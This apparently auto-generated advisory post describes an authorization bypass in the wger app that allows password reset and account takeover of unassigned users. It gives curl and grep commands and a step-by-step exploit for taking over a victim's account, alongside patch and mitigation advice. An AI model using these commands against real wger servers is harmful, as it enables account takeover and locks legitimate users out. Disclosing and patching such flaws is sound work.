wger, Incorrect authorization, CVE-ID: N/A (Critical)

By /

Listen to this Post

The vulnerability arises in the `reset_user_password` and `gym_permissions_user_edit` views. The authorization check uses a Python object comparison (!=) that evaluates `None != None` as False. This means that if both the attacker (trainer) and victim are unassigned to any gym (gym=None), the guard is silently bypassed. Consequently, an authenticated attacker with `gym.manage_gym` permission can reset the password of any other unassigned user. The new plaintext password is then rendered verbatim in the HTML response, allowing immediate account takeover. The original password is invalidated, locking the victim out permanently. This flaw affects five views in total, all of which share the same vulnerable authorization pattern.

DailyCVE form:

Platform: `wger`
Version: `latest / Django 5.2.13`
Vulnerability : `Authorization bypass`
Severity: `Critical (CVSS 9.9)`
Date: `2026-04-28`

Prediction: `Patch by 2026-05-15`

What Undercode Say:

Check if the vulnerable endpoint is exposed
curl -X GET "https://target.example/en/gym/user/2/reset-user-password" \
-H "Cookie: sessionid=attacker_session"
Extract plaintext password from response
grep -oP '(?<=<th>Password</th><td>)[^<]+' response.html
Log in as victim
curl -X POST "https://target.example/en/user/login" \
-d "username=victim&password=extracted_password&csrfmiddlewaretoken=..."

Exploit:

  1. Attacker logs in with `gym.manage_gym` permission and gym=None.

2. Attacker sends GET request to `/en/gym/user//reset-user-password`.

  1. Server returns HTTP 200 with the new password in plaintext.
  2. Attacker uses the leaked password to log in as the victim, locking them out.

Protection from this CVE:

  • Apply the patch that replaces `request.user.userprofile.gym != user.userprofile.gym` with a comparison using raw foreign keys (_id) and an explicit `is None` guard.
  • Avoid relying on Python object semantics for authorization; use integer IDs and explicit null checks.
  • Restrict `gym.manage_gym` permission to trusted administrators only until patched.

Impact:

  • Full account takeover of any unassigned (gym=None) user.
  • Permanent lockout of the victim (original password invalid).
  • Affects every wger instance where `gym.manage_gym` is delegated and public registration is enabled.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top